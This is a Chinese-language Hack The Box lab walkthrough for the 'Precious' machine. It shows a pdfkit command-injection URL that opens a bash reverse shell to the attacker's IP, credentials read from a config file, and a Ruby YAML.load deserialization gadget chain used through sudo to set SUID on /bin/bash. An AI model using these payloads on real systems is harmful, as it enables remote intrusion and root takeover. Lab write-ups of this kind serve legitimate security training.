Precious HTB Writeup
2023-03-04 本文已影响0人
doinb1517
logo.png
知识点
1、pdfkit的RCE漏洞
2、提权
WP
1、访问IP得到域名precious.htb
01.png
nmap扫描一波,开启了22,80端口
02.png
先测试网站功能点,网站上可以转换web页面成pdf,实验了一下百度,发现报错Cannot load remote URL!
03.png
使用python3起一个http server
python3 -m http.server 80
web页面上可以访问到当前目录,可以下载到文件,是pdf格式的
04.png
使用exiftool解析pdf文件信息
exiftool 5013dj9nl5h13bd7lmv8gkqn5ndpe8zz.pdf
05.png
找到一个命令注入漏洞,https://github.com/shamo0/PDFkit-CMD-Injection
开启一个webserver,重新开一个shell,监听反弹shell端口
http://10.10.14.18?name=#{'%20`bash -c "sh -i >& /dev/tcp/10.10.14.18/9999 0>&1"`'}
拿到反弹shell
06.png
在/home/ruby/.bundle目录下找到config文件,获取到了用户名和密码
07.png
henry@precious:~$ cat /home/henry/user.txt
fd652c1495464dcea3800fd4801ba740
尝试提权
henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User henry may run the following commands on precious:
(root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb
henry@precious:~$ cat /opt/update_dependencies.rb
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'
# TODO: update versions automatically
def update_gems()
end
def list_from_file
YAML.load(File.read("dependencies.yml"))
end
def list_local_gems
Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end
gems_file = list_from_file
gems_local = list_local_gems
gems_file.each do |file_name, file_version|
gems_local.each do |local_name, local_version|
if(file_name == local_name)
if(file_version != local_version)
puts "Installed version differs from the one specified in file: " + local_name
else
puts "Installed version is equals to the one specified in file: " + local_name
end
end
end
end
ruby的YAML.load函数是不安全的,会造成反序列换漏洞
参考:https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml
payload如下
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: id //这里改命令
method_id: :resolve
改造一下 给/bin/bash加上SUID位
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: "chmod +s /bin/bash"
method_id: :resolve
运行命令提权
sudo /usr/bin/ruby /opt/update_dependencies.rb
成功提权获得root权限
08.png
b281e4eebb264c1f8dee8589d9365517
